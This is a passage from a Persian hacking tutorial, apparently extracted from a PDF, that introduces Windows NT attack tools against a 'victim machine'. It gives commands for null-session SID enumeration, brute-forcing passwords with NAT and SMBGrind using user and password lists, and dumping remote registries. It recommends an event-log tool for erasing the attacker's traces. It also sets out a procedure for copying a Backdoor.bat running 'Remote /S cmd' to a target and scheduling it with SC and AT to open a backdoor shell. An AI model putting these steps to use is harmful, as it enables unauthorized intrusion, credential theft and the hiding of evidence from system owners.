ﺁﻧﻬﺎ اﺱﺖ ‪ .‬اﺡﺘﻴﺎج ﺏﻪ ﻧﺸﺴﺖ ‪ Null‬دارد ‪ .‬ﻣﻴﺘﻮان ﺁن را روی‬ ‫ﻣﺎﺷﻴﻦ ﻗﺮﺏﺎﻧﯽ ﻓﺮﺱﺘﺎد و ﺏﻌﺪ در ﺁﻧﺠﺎ اﺟﺮا ﮐﺮد و ﺟﻮاب هﺎ را ﻣﺸﺎهﺪﻩ ﮐﺮد ‪.‬‬ ‫در ﻣﺠﻤﻮع ﮐﺎرایﯽ ﺁن ﻋﺎﻟﯽ اﺱﺖ و اﮔﺮ ﺏﻪ ﺧﻂ ﻓﺮﻣﺎن ﻗﺮﺏﺎﻧﯽ دﺱﺖ رﺱﯽ داریﺪ ﺡﺘﻤﺎ ایﻦ را اﻣﺘﺤﺎن ﮐﻨﻴﺪ ‪.‬‬ ‫‪ -٣‬اﺑﺰار ‪ SID 2 User‬و ‪: User 2 SID‬‬ ‫یﮏ ﻧﻤﻮﻧﻪ ایﻦ را ﺏﺎﻻ ﺕﺮ هﺎ ﻣﻌﺮﻓﯽ ﮐﺮدم‪ .‬در ﻣﻮاﻗﻌﯽ ﮐﻪ ‪ Restrict Anonymous‬در ‪ Registry‬ﺏﺮاﺏﺮ ﺏﺎ ‪ ١‬ﺕﻨﻈﻴﻢ ﺷﺪﻩ ﺏﺎﺷﺪ ﺧﻴﻠﯽ از‬ ‫اﺏﺰارهﺎی ﺏﺎﻻ ﺟﻮاب ﺏﺮای ﻣﺎ ﺏﺮﻧﻤﯽ ﮔﺮداﻧﺪ در ایﻦ واﻗﻊ ﻣﺎ از ایﻦ دو اﺏﺰار ﺏﺮای ﻓﻬﻤﻴﺪن ‪ SID‬ﻣﺪیﺮ ﮐﻪ ﺏﺮاﺏﺮ ﺏﺎ ‪ ۵٠٠‬ﻧﻴﺰ هﺴﺖ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ‪.‬‬ ‫ایﻦ اﺏﺰار هﻢ ﻧﻴﺎز ﺏﻪ یﮏ ﻧﺸﺴﺖ ‪ Null‬دارد ‪ .‬ﺏﻪ ﻣﻨﻈﻮر ﺏﻪ ﮐﺎرﮔﻴﺮی ‪ User 2 SID‬ﻧﺨﺴﺖ ﺏﺎیﺪ ‪ Null‬ﺏﺮای ﺱﺮویﺲ دهﻨﺪﻩ ایﺠﺎد ﮐﺮد و ﺱﭙﺲ‬ ‫‪ User 2 SID‬را ﺏﺮ ﺧﻼف ﺱﺮویﺲ دهﻨﺪﻩ هﺪف و یﮏ ﮔﺮوﻩ ﺷﻨﺎﺧﺘﻪ ﺡﺴﺎب را ﺏﺮای ﺕﻌﻴﻴﻦ ﺷﻨﺎﺱﻪ ‪ SID‬راهﺎﻧﺪازی ﮐﺮد‪.‬ﺕﺮﺕﻴﺐ ﭘﺎیﻴﻦ ‪SID‬‬ ‫دﺱﺘﮕﺎﻩ هﺪف را ﺏﺎز ﻣﻴﮕﺮداﻧﺪ ‪:‬‬ ‫“ ‪C :\> user 2 sid \\ server-name “ domain user‬‬ ‫ﺱﭙﺲ ایﻦ وﺱﻴﻠﻪ ‪ SID‬را ﺏﺮای ﺱﺮویﺲ دهﻨﺪﻩ ﺏﺎز ﻣﻴﮕﺮداﻧﺪ‪ .‬اﮐﻨﻮن ﮐﻪ ‪ SID‬دﺱﺘﮕﺎﻩ و ﺷﻨﺎﺱﻪ ﻧﺴﺒﯽ )‪ (RED‬ﮔﺮوﻩ ﻣﺪیﺮیﺖ را در اﺧﺘﻴﺎر داریﺪ ‪،‬‬ ‫ﻗﺎدر ﺏﻪ راﻩ اﻧﺪازی ‪ SID 2 User‬ﺟﻬﺖ ﺕﻌﻴﻴﻦ ‪ IDS‬ﮐﺎرﺏﺮ ﺧﻮاهﻴﺪ ﺏﻮد ﮐﻪ از ﻣﺪیﺮان ﺏﻪ ﺡﺴﺎب ﻣﯽ ﺁیﻨﺪ‪ .‬ﺕﺮﺕﻴﺐ ایﻦ دﺱﺘﻮر ﺏﻪ ﺻﻮرت زیﺮ‬ ‫اﺱﺖ‪:‬‬ ‫‪C :\> SID 2 User \\ server-name \ machine-sid admin-RID‬‬ ‫‪ -۴‬اﺑﺰار ‪ NAT‬و ﻳﺎ ﺑﺎ ﻧﺎم ﮐﻤﺎل ‪: Net BIOS Auditing Tool‬‬ ‫ایﻦ اﺏﺰار ﺏﺮای ﺕﺴﺖ ﮐﻠﻤﺎت ﻋﺒﻮر ﺏﺮ روی یﮏ ﮐﺎرﺏﺮ و یﺎ ﻓﻬﺮﺱﺘﯽ از ﮐﺎرﺏﺮان ﺏﺎ ﻣﮑﺎﻧﻴﺰم ‪ Brute Force‬اﺱﺖ ﮐﻪ اﻟﺒﺘﻪ ﮐﻠﯽ رد ﭘﺎ از ﺧﻮدش‬ ‫ﺏﻪ ﺟﺎ ﻣﻴﮕﺰارد و ﮐﻨﺪ ﻧﻴﺰ هﻢ اﺱﺖ وﻟﯽ ﮐﺎرای ﺁن ﺧﻮب اﺱﺖ !!‬ ‫ایﻦ اﺏﺰار ﺁﻧﻘﺪر ﮐﺎر ﻣﻴﮑﻨﺪ ﺕﺎ یﮏ ﻧﺎم ﮐﺎرﺏﺮ و ﮐﻠﻤﻪ ﻋﺒﻮر ﺏﻪ درد ﺏﺨﻮر ) ﻣﻌﺘﺒﺮ( ﭘﻴﺪا ﮐﻨﺪ ﺏﻌﺪ ﻣﺘﻮﻗﻒ ﻣﻴﺸﻮد !!ﺷﮑﻞ ﮐﺎر ﺏﺎ ایﻦ ﺏﻪ ﺻﻮرت زیﺮ‬ ‫اﺱﺖ ‪:‬‬ ‫‪C :\> nat –O out put.txt –u user list.txt –p passlist.txt xxx.xxx.xxx.xxx‬‬ ‫‪ -۵‬اﺑﺰار ‪: SMB Grind‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٦١‬‬

‫ایﻦ اﺏﺰار هﻢ دﻗﻴﻘﺎ ﻣﺜﻞ ﺏﺎﻻی اﺱﺖ و از هﻤﺎن ﻣﮑﺎﻧﻴﺰم اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ وﻟﯽ ﻓﺮق ایﻦ ﺏﺎ ﺏﺎﻻیﯽ ایﻦ اﺱﺖ ﮐﻪ ﺧﻴﻠﯽ ﺱﺮیﻊ ﺕﺮ اﺱﺖ ﮐﺎر ﺏﺎ ایﻦ هﻢ ﺱﺎدﻩ‬ ‫اﺱﺖ ﺷﮑﻞ ﻋﻤﻮﻣﯽ دﺱﺘﻮر در ایﻦ ﺏﺮﻧﺎﻣﻪ ﺏﻪ ﺻﻮرت زیﺮ اﺱﺖ ‪:‬‬ ‫‪C :\> smbgrind –i IP address –r Net BOIS -v‬‬ ‫دارای یﮏ ﺕﻌﺪادی ﺱﻮیﭻ هﺴﺖ ﮐﻪ ﺏﻪ ﺧﻮدﺕﺎن ﺕﻮﺽﻴﺤﺎت ﺁن را واﮔﺬار ﻣﻴﮑﻨﻢ ‪.‬‬ ‫‪ -۶‬اﺑﺰار ‪: Somarsoft DumpReg‬‬ ‫ایﻦ اﺏﺰار اﻣﮑﺎن ﺕﻘﺎﺽﺎی اﻃﻼﻋﺎت ‪ registry‬را از ﺱﺮویﺲ دهﻨﺪﻩ راﻩ دور ﻓﺮاهﻢ ﻣﻴﮑﻨﺪ‪ .‬ایﻦ اﺏﺰار اﺡﺘﻴﺎج ﺏﻪ اﺕﺼﺎل ‪ NULL‬دارد ﮐﻪ ﺏﺎیﺪ ﺏﺎ‬ ‫دﺱﺘﻮر ‪ NET USE‬ایﺠﺎد ﮐﻨﻴﺪ‪ .‬ایﻦ را ﺏﮕﻮیﻢ هﻢ ﮐﻪ ایﻦ اﺏﺰار ﮔﺮاﻓﻴﮑﯽ اﺱﺖ ‪.‬‬

‫‪ -٧‬اﺑﺰار ‪: Fport‬‬ ‫ایﻦ اﺏﺰار ﻗﺎدر اﺱﺖ راﺏﻄﻪ ﻣﻮﺟﺪ ﻣﻴﺎن ﭘﻮرت هﺎی ‪ TCP‬و ‪ UDP‬ﻣﺎﺷﻴﻦ ﻗﺮﺏﺎﻧﯽ را ﺏﺎ ﺏﺮﻧﺎﻣﻪ هﺎی در ﺡﺎل اﺟﺮا ﺏﺮ روی ایﻦ ﻣﺎﺷﻴﻦ ﺁﺷﮑﺎر ﮐﻨﺪ‪.‬‬ ‫ﺕﻮﺻﻴﻪ ﻣﻴﮑﻨﻢ ﮐﻪ اﮔﺮ ﺏﻪ ﺧﻂ ﻓﺮﻣﺎن ﻗﺮﺏﺎﻧﯽ دﺱﺘﺮﺱﯽ داریﺪ از ایﻦ ﺏﺮﻧﺎﻣﻪ اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ ﺕﺎ ﻣﻮﻗﻌﻴﺖ اﻧﻮاع ﻣﺨﺘﻠﻔﯽ از ﺏﺮﻧﺎﻣﻪ هﺎیﯽ ﮐﻪ اﻣﮑﺎن ورود‬ ‫ﺏﻪ ﺱﻴﺴﺘﻢ را ﺏﻪ ﺷﻤﺎ ﻣﻴﺪهﺪ را ﺏﺮای ﺷﻤﺎ ﺁﺷﮑﺎر ﮐﻨﺪ‪.‬‬ ‫‪ -٨‬اﺏﺰار ‪: Loggedon‬‬ ‫ایﻦ اﺏﺰار ﺏﺮای ایﻦ اﺱﺖ ﮐﻪ ﺏﺒﻴﻨﻴﻢ ﭼﻪ ﮐﺴﺎﻧﯽ و اﻟﺒﺘﻪ از ﭼﻪ راﻩ هﺎیﯽ ﺏﻪ ﻣﺎﺷﻴﻦ هﺪف دﺱﺘﺮﺱﯽ دارﻧﺪ‪ .‬ایﻦ هﻢ ذﮐﺮ ﮐﻨﻢ ﮐﻪ ﺱﻮیﭻ و‪ ..‬ﻧﺪارد و یﮏ‬ ‫ﻓﺮﻣﺎن ﺕﻨﻬﺎ اﺱﺖ و اﻟﺒﺘﻪ ایﻦ اﺏﺰار ﮐﺎر ﺏﺮاﻧﯽ و اﻟﺒﺘﻪ روﺷﻬﺎی اﺕﺼﺎل ﻗﺎﻧﻮﻧﯽ را ﻓﻘﻂ ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ و اﻣﺜﺎل ﺧﻮدﻣﺎن را ﻧﻤﺎیﺶ ﻧﻤﻴﺪهﺪ !!‬ ‫‪ -٩‬اﺏﺰار ‪: NT Last‬‬ ‫ایﻦ اﺏﺰار دﻗﻴﻘﺎ ﮐﺎرای ﺏﺎﻻ را دارد ﺏﺎ ایﻦ ﺕﻔﺎوت ﮐﻪ ﮐﺎر ﺏﺮاﻧﯽ و روﺷﻬﺎی اﺕﺼﺎل ﮐﻪ ﻗﺒﻞ ﺏﻪ ﻣﺎﺷﻴﻦ هﺪف ﻣﺘﺼﻞ ﺏﻮدن و اﻻن ﻣﺘﺼﻞ ﻧﻴﺴﺘﻨﺪ را‬ ‫ﻧﺸﺎن ﻣﻴﺪهﺪ!!‬ ‫ﺿﻤﻴﻤﻪ ﭼﻬﺎرم ؛ ﻣﻌﺮﻓﯽ اﺑﺰار هﺎی ‪: NT Resource Kit‬‬ ‫ایﻦ هﻤﻴﻦ ﺟﺎ اول ﮐﺎر ﺏﮕﻮیﻢ ﮐﻪ ایﻦ ﺏﺴﺘﻪ اﺏﺰارهﺎی زیﺎدی دارد و ﻣﻦ ﻓﻘﻂ ﺁﻧﻬﺎیﯽ را ﻣﻌﺮﻓﯽ ﻣﻴﮑﻨﻢ ﮐﻪ ﺏﻪ درد ﮐﺎر ﻣﺎ ﺏﺨﻮرد ﺏﺮای ﺕﻬﻴﻪ ایﻦ ﺏﺴﺘﻪ‬ ‫ﺏﺪ ﻧﻴﺴﺖ یﮏ ﺱﺮی ﺏﻪ ﺱﺎیﺖ ﻣﺎیﮑﺮوﺱﺎﻓﺖ ﺏﺰﻧﻴﺪ ﮐﻞ ﺟﻌﺒﻪ ﺁن را ﭘﻴﺪا ﻣﻴﮑﻨﻴﺪ !!! دوﺏﺎرﻩ ﺕﺎﮐﻴﺪ ﻣﻴﮑﻨﻢ ﻗﺴﻂ ﻣﻦ ﻓﻘﻂ ﻣﻌﺮﻓﯽ اﺱﺖ ﻧﻪ ﺁﻣﻮزش ﮐﺎﻣﻞ‬ ‫ﺏﻘﻴﻪ ﮐﺎر را ﺏﺎیﺪ ﺧﻮدﺕﺎن ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ ﻧﻴﺎزﺕﺎن اﻧﺠﺎم دهﻴﺪ !!‬ ‫‪ -١‬اﺑﺰار ‪ DUMPEL‬و ﻳﺎ ﺑﺎ ﻧﺎم ﮐﺎﻣﻞ ‪: Dump Event Log‬‬ ‫ایﻦ اﺏﺰار ﺏﺮای ﻣﺸﺎهﺪﻩ اﺕﻔﺎق هﺎی اﻣﻨﻴﺘﯽ اﺱﺖ ﮐﻪ اﻓﺘﺎدﻩ و ﺙﺒﺖ ﺷﺪﻩ و ﮐﺎرای ﺧﻮﺏﯽ ﻧﻴﺰ دارد اﻟﺒﺘﻪ ﺏﺎ ویﺮایﺶ ایﻦ اﺏﺰار هﻴﭻ وﻗﺖ زﻣﺎن ویﺮایﺶ‬ ‫ﻓﺎیﻞ ﺙﺒﺖ وﻗﺎیﻊ ﻋﻮض ﻧﻤﻴﺸﻮد در ﮐﻞ ﺧﻮب اﺱﺖ ﺏﺮای ﭘﺎک ﮐﺮدن رد ﭘﺎهﺎی ﺧﻮدﻣﺎن !!‬ ‫‪ -٢‬اﺑﺰار ‪: NLTEST‬‬ ‫هﻨﮕﺎم ﺕﻌﻴﻴﻦ داﻣﻨﻪ در ﺷﺒﮑﻪ ﻣﻴﺘﻮان ﮐﻨﺘﺮل هﺎی داﻣﻨﻪ را ﻣﺴﺘﻘﺮ ﮐﺮد !! ایﻦ اﺏﺰار ﺏﺮای ﺟﺎیﮕﺰیﻨﯽ ایﻦ ﮐﻨﺘﺮل ﮐﻨﻨﺪﻩ هﺎ ﻣﻮرد اﺱﺘﻔﺎدﻩ ﻗﺮار‬ ‫ﻣﻴﮕﻴﺮد!!‬ ‫ﺷﻤﺎ ﺏﺮای اﺱﺘﻔﺎدﻩ از ایﻦ اﺏﺰار ﻧﻴﺎز ﺏﻪ ﭘﻮرت ‪ ١٣٩‬ﺏﺎز داریﺪ و اﻟﺒﺘﻪ هﻴﭻ ﻧﻴﺎزی ﺏﻪ داﻧﺴﺘﻦ ﮐﻠﻤﻪ ﻋﺒﻮر و ﻧﺎم ﺡﺴﺎب ﮐﺎرﺏﺮی ﻧﺪاریﺪ !!!‬ ‫‪ -٣‬اﺑﺰار ‪: EDUMP‬‬ ‫ایﻦ اﺏﺰار ﺏﺮای ﺏﺪﺱﺖ ﺁوردن اﻃﻼﻋﺎت اﺽﺎﻓﯽ از ﺱﻴﺴﺘﻢ هﺪف اﺱﺖ از ﺟﻤﻠﻪ ﺧﺪﻣﺎت اﻧﺘﻘﺎل هﺎ !!و ﻧﺸﺎﻧﯽ هﺎی ‪ IP‬ﺱﻴﺴﺘﻢ هﺎی هﺪف و‪...‬‬ ‫‪: USRSTAT -۴‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٦٢‬‬

‫ﺏﺮﻧﺎﻣﻪ ای اﺱﺖ ﮐﻪ اﻣﮑﺎن ﮔﺮد ﺁوری ﻣﻄﺎﻟﺐ ﮐﺎرﺏﺮ را از ﮐﻨﺘﺮل ﮐﻨﻨﺪﻩ داﻣﻨﻪ هﺪف ﻓﺮاهﻢ ﻣﻴﺴﺎزد‪ .‬ﺏﺮای ﮐﺸﻒ ﮐﻨﺘﺮل ﮐﻨﻨﺪﻩ ﻣﻴﺘﻮاﻧﻴﺪ از‬ ‫‪ NLTEST‬و یﺎ هﺮ اﺏﺰار ﻣﻮرد ﻋﻼﻗﻪ دیﮕﺮ اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ‪ .‬ایﻦ اﺏﺰار ﻧﻴﺎز ﺏﻪ یﮏ اﺕﺼﺎل ‪ NULL‬ﻧﻴﺰ دارد‪.‬‬ ‫‪ -۵‬اﺑﺰار ‪: Local Administrators‬‬ ‫ایﻦ اﺏﺰار ﺏﺮای ﺕﺸﺨﻴﺺ ﺡﺴﺎب هﺎی ﮐﺎرﺏﺮی ﺏﺎ ﻣﺠﻮز ﻣﺪیﺮ اﺱﺖ اﻟﺒﺘﻪ ﻓﻘﻂ ﻣﺤﻠﯽ ﻧﻴﺴﺖ و از راﻩ دور هﻢ ﮐﺎر ﻣﻴﮑﻨﺪ !!‬ ‫‪ -۶‬اﺑﺰار ‪: Global‬‬ ‫ایﻦ اﺏﺰار دﻗﻴﻘﺎ ﻣﺜﻞ ﻗﺒﻠﯽ اﺱﺖ و ﻓﻘﻂ از ﮐﻨﺘﺮل داﻣﻨﻪ ﺏﺮای ﺕﺸﺨﻴﺺ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ ایﻦ دﺱﺘﻮر ﻧﻴﺎز ﺏﻪ یﮏ اﺕﺼﺎل ‪ NULL‬ﻧﻴﺰ دارد و اﻟﺒﺘﻪ ﺏﻪ‬ ‫ﭘﻮرت ‪ ١٣٩‬ﺏﺎیﺪ ﺏﺎز ﺏﺎﺷﺪ !!‬ ‫‪ -٧‬اﺑﺰار ‪: Srvcheck‬‬ ‫ایﻦ اﺏﺰار ﺏﺮای ﮐﺸﻒ ﺱﺮویﺲ دهﻨﺪﻩ و اﻃﻼﻋﺎت ﻣﺠﻮز اﺷﺘﺮاک ﺏﻪ ﮐﺎر ﻣﻴﺮود و اﻃﻼﻋﺎت اﺷﺘﺮاک هﺎی ﻣﺨﻔﻴﺎﻧﻪ را ﻧﻴﺰ ﮐﺸﻒ ﻣﻴﮑﻨﺪ‪ .‬ﻧﻴﺎز ﺏﻪ‬ ‫یﮏ اﺕﺼﺎل ‪ NULL‬دارد ﺕﺎ ﮐﺎر ﺏﮑﻨﺪ‪.‬‬ ‫‪ -٨‬اﺑﺰار ‪: SRVINFO‬‬ ‫ایﻦ اﺏﺰار ﺏﻪ ﻣﻨﻈﻮر ﺏﺮ ﺷﻤﺮدن اﻃﻼﻋﺎت ﻣﻔﺼﻞ در ﻣﻮرد ﺱﺮویﺲ دهﻨﺪﻩ هﺪف ﻣﻮرد اﺱﺘﻔﺎدﻩ ﻗﺮار ﻣﻴﮕﻴﺮد‪ .‬ایﻦ اﻃﻼﻋﺎت در ﺏﺮ ﮔﻴﺮﻧﺪﻩ ؛ ﺧﺪﻣﺎت‬ ‫‪ ،‬ﮔﺮداﻧﺪﻩ هﺎ ‪ ،‬ﻧﺴﺨﻪ ﻧﺮم اﻓﺰار و اﺷﺘﺮاک هﺎ ﻣﻴﺒﺎﺷﺪ‪ .‬ایﻦ اﺏﺰار ﺏﺎز هﻢ ﻣﺜﻞ ﻗﺒﻠﯽ هﺎ ﻧﻴﺎز ﺏﻪ یﮏ اﺕﺼﺎل ‪ NULL‬دارد‪.‬‬ ‫‪ -٩‬اﺑﺰار ‪: AUDITPOL‬‬ ‫ایﻦ اﺏﺰار ﺟﻬﺖ ﺏﺮﺱﯽ از راﻩ دور و ﺡﺴﺎب هﺎی ﻓﻌﺎل یﺎ ﻏﻴﺮ ﻓﻌﺎل ﺱﻴﺴﺘﻢ ‪ NT‬ﺏﻪ ﮐﺎر ﻣﻴﺮود و اﮔﺮ ﻣﻴﺨﻮاهﻴﺪ درﺱﺖ ﮐﺎر ﮐﻨﺪ ﻧﻴﺎز ﺏﻪ دﺱﺘﺮﺱﯽ‬ ‫ﻣﺪیﺮیﺘﯽ ﻧﻴﺰ ﻣﻴﺒﺎﺷﺪ‪ .‬اﻟﺒﺘﻪ دﺱﺘﻮرات ﻗﺎﺏﻞ اﺟﺮای ﺏﻌﺪی ﺏﺮ روی ﺱﻴﺴﺘﻢ را ﻧﻴﺰ ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ‪.‬‬ ‫‪ -١٠‬اﺑﺰار ‪: SOMARSOFT DUMPREG‬‬ ‫ایﻦ اﺏﺰار اﻣﮑﺎن دﺱﺘﺮﺱﯽ ﺏﻪ ﻣﻘﺎدیﺮ ‪ Registry‬را ﺏﺮای ﻣﺎ ﻓﺮاهﻢ ﻣﻴﮑﻨﺪ‪ .‬ایﻦ اﺏﺰار اﺡﺘﻴﺎج ﺏﻪ یﮏ اﺕﺼﺎل ‪ NULL‬دارد و اﻟﺒﺘﻪ ﺏﺎ یﮏ ‪ID‬‬ ‫ﻣﻌﺘﺒﺮ‪.‬‬ ‫‪ -١١‬اﺑﺰار ‪: REGDMP‬‬ ‫ایﻦ اﺏﺰار ﺟﻬﺖ ﻧﺴﺨﻪ ﺏﺮداری اﻃﻼﻋﺎت ‪ Registry‬از ﺱﺮویﺲ دهﻨﺪﻩ ﺏﻪ ﮐﺎر ﻣﻴﺮود ﻣﻌﻤﻮﻻ ﻧﻴﺎز ﺏﻪ دﺱﺖ رﺱﯽ ﻣﺪیﺮیﺘﯽ دارد و اﻟﺒﺘﻪ ﻧﻴﺎز ﺏﻪ‬ ‫اﺕﺼﺎل ‪. null‬‬ ‫‪ -١٢‬اﺑﺰار ‪: Remote‬‬ ‫ایﻦ اﺏﺰار ﺏﺮای ﮐﺴﺐ دﺱﺘﺮﺱﯽ ﺧﻂ ﻓﺮﻣﺎن هﺪف ﻣﻮرد اﺱﺘﻔﺎدﻩ ﻗﺮار ﻣﻴﮕﻴﺮد ‪.‬ﭘﻴﺶ از ﺏﻪ ﮐﺎر ﮔﻴﺮی ایﻦ اﺏﺰار ﺏﺎیﺪ ﮐﻠﻤﻪ ﻋﺒﻮر و ﻧﺎم ﮐﺎرﺏﺮی ﺏﺎ‬ ‫ﻣﺠﻮز ﻣﺪیﺮ دﺱﺖ یﺎﻓﺖ‪ .‬هﻤﭽﻨﻴﻦ ‪ SC.exe‬و ‪ ) remote.exe‬اﮔﺮ ﺱﺮویﺲ ‪ Scheduler‬در هﺪف ﺁﺷﮑﺎر ﻧﺸﺪﻩ ﺏﺎﺷﺪ و ﻓﺎیﻞ ﮔﺮوﻩ‬ ‫)‪ ( Backdoor.Bat‬را ﺏﺮای هﺪف ﻧﺴﺨﻪ ﺏﺮداری ﻣﻴﮑﻨﻴﻢ‪ .‬ایﻦ ﻓﺎیﻞ ﮔﺮوهﯽ ﺡﺎوی دﺱﺘﻮر زیﺮ اﺱﺖ ‪:‬‬ ‫‪Remote /S (cmd) pipname‬‬ ‫‪ Pipe‬ﺧﻮد را ﺏﻪ هﺮ ﻧﺎﻣﯽ ﮐﻪ ﺏﺨﻮاهﻴﺪ ‪ ،‬ﻣﻴﺘﻮاﻧﻴﺪ ﻧﺎم ﮔﺬاری ﮐﻨﻴﺪ‪ .‬ﺱﭙﺲ ﺏﻪ ﻣﻨﻈﻮر اﺟﺮای ﻓﺎیﻞ ﮔﺮوهﯽ ﺏﺎیﺪ یﮏ روش دﺱﺖ یﺎﺏﻴﻢ ﮐﻪ ﻣﻌﻤﻮﻻ از‬ ‫‪ Scheduler‬اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ‪ .‬هﻨﮕﺎﻣﻴﮑﻪ ﻓﺎیﻞ ﮔﺮوهﯽ اﺟﺮا ﻣﻴﺸﻮد ﻣﻴﺘﻮان ﺏﻮﺱﻴﻠﻪ دﺱﺘﻮر زیﺮ ﺏﺎ ﺱﺮویﺲ دهﻨﺪﻩ ارﺕﺒﺎط ﺏﺮﻗﺮار ﮐﺮد ‪:‬‬ ‫‪C:\> Remote /C Servername pipename‬‬ ‫‪ -١٣‬اﺑﺰار ‪: SC‬‬ ‫ایﻦ اﺏﺰار ﺏﻪ ﻣﻨﻈﻮر ﺁﻏﺎز و ﺕﻮﻗﻒ ﺱﺮویﺲ ‪ Schedule‬در ﺱﻴﺴﺘﻢ ﻣﺤﻠﯽ ﺏﻪ ﮐﺎر ﻣﻴﺮود !! ﺏﺮای ﺏﻪ ﮐﺎرﮔﻴﺮی ایﻦ اﺏﺰار ﺏﺎیﺪ دﺱﺘﺮﺱﯽ ﻣﺪیﺮیﺘﯽ و‬ ‫‪ NetBIOS‬ﺁﺷﮑﺎری در اﺧﺘﻴﺎر داﺷﺖ‪ Schedule Service .‬ﺏﻪ ﻣﻨﻈﻮر اﺟﺮای زﻣﺎن ﺏﻨﺪی ﻣﺸﺎﻏﻞ ﺏﻪ ﮐﺎر ﻣﻴﺮود ‪ ،‬هﻤﭽﻮن یﮏ ﻓﺎیﻞ ﮔﺮوهﯽ‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٦٣‬‬

‫ﮐﻪ ﺡﺎوی یﮏ ﭘﺮدازﻩ ﺏﺮای ﮔﺸﻮدن درب ﭘﺸﺘﯽ اﺱﺖ ﮐﻪ ﺕﻮﺱﻂ ‪ Remote‬یﺎ ‪ NC‬ﺻﻮرت ﻣﻴﮕﻴﺮد‪ .‬ﺏﺮای ﺁﻏﺎز ﺱﺮویﺲ ‪ Scheduler‬در ﺱﻴﺴﺘﻢ‬ ‫از راﻩ دور ﺏﺎیﺪ از دﺱﺘﻮر زیﺮ اﺱﺘﻔﺎدﻩ ﮐﺮد‪:‬‬ ‫‪C :\> SC \\ Server Start Schedule‬‬ ‫هﻤﭽﻨﻴﻦ ﺏﻪ ﻣﻨﻈﻮر ﺕﺎیﻴﺪ ﺱﺮویﺲ ‪ Schedule‬ﮐﻪ ﺟﺮیﺎن دارد و یﺎ ﭘﺮﺱﺶ ‪ Scheduler‬ﺏﺎیﺪ دﺱﺘﻮر زیﺮ اﺱﺘﻔﺎدﻩ ﮐﻨﻴﻢ ‪:‬‬ ‫‪C :\> SC \\ Server query Schedule‬‬ ‫هﻨﮕﺎم ﺏﻪ ﮐﺎر ﮔﻴﺮی از ایﻦ دﺱﺘﻮر ﺷﺎیﺪ ﺏﻪ اﺱﺘﻔﺎدﻩ از ‪ AT‬یﺎ ‪ Net time‬ﺟﻬﺖ ایﺠﺎد هﻤﺎهﻨﮕﯽ در ‪ Schedule‬ﻧﻴﺎز ﺏﺎﺷﺪ‪.‬‬ ‫‪ -١۴‬اﺑﺰار ‪: AT‬‬ ‫ایﻦ اﺏﺰار را ﻣﻴﺘﻮان ﺟﻬﺖ ﺏﺮﻧﺎﻣﻪ ریﺰی از راﻩ دور ﺏﻮﺱﻴﻠﻪ ‪ Schedule Service‬اﺱﺘﻔﺎدﻩ ﮐﺮد و هﻨﮕﺎم در دﺱﺘﺮس ﻗﺮار ﻣﻴﮕﻴﺮد ﮐﻪ ﭘﺮدازﻩ ایﯽ‬ ‫را اﺟﺮا ﮐﺮد و دﺱﺘﺮﺱﯽ ‪ Remote‬را ﺏﻪ ﺱﻴﺴﺘﻢ ﺕﻘﻮیﺖ ﮐﺮد‪ .‬اول ﺏﺎیﺪ ﺙﺎﺏﺖ ﮐﺮد ﮐﻪ ‪ Schedule Service‬در ﻣﻴﺰﺏﺎن ﺁﻏﺎز ﺷﺪﻩ اﺱﺖ و یﺎ‬ ‫ﺱﺮویﺲ را ﺏﺎ دﺱﺘﻮر ‪ SC‬ﺏﺎﻻ ﺏﻪ ﮐﺎر ﮔﺮﻓﺖ‪ .‬ﺱﭙﺲ زﻣﺎن ﻣﺤﻠﯽ را ﮐﺸﻒ ﮐﺮد ﺏﻌﺪ از دﺱﺘﻮر زیﺮ اﺱﺘﻔﺎدﻩ ﮐﺮد‪:‬‬ ‫”‪C :\> at \\ Server time “Command‬‬ ‫ﺷﻤﺎ ﻣﻴﺘﻮاﻧﻴﺪ ﺏﻪ ﺟﺎی ‪ Command‬ﻣﺴﻴﺮ ﭘﺮدازﻩ ﺧﻮد را ﺏﻨﻮیﺴﻴﺪ‪ .‬ﮐﻪ در اﺏﺰار ﻗﺒﻠﯽ ﺕﻮﺽﻴﺢ دادم ﻣﺜﻼ ﻓﺎیﻞ ‪ Backdoor.Bat‬ﮐﻪ ﺡﺎوی ﭘﺮدازﻩ‬ ‫ای ﺟﻬﺖ ﭘﺮداﺧﺘﻦ ﺏﻪ ‪ Remote‬یﺎ ‪ NC‬ﻣﻴﺒﺎﺷﺪ ﺕﺎ درب ﭘﺸﺘﯽ را در ﻣﺎﺷﻴﻦ هﺪف ایﺠﺎد ﮐﺮد‪ .‬ﺟﻬﺖ ﭘﺮﺱﺶ از ایﻦ ﮐﻪ ﭼﻪ ﻣﺸﺎﻏﻠﯽ ایﺠﺎد ﺷﺪﻩ اﻧﺪ‬ ‫از دﺱﺘﻮر زیﺮ اﺱﺘﻔﺎدﻩ ﻣﻴﺸﻮد ‪:‬‬ ‫‪C :\> at \\ Server‬‬ ‫‪ -١۵‬اﺑﺰار ‪: KILL‬‬ ‫ایﻦ اﺏﺰار ﺏﺮای ﻧﺎﺏﻮد ﮐﺮدن یﮏ ﻓﺮایﻨﺪ ﻣﻮرد اﺱﺘﻔﺎدﻩ ﻗﺮار ﻣﻴﮕﻴﺮد‪ .‬ﺷﮑﻞ دﺱﺘﻮر ایﻦ ﺟﻮری اﺱﺖ‪:‬‬ ‫>‪D :\> kill
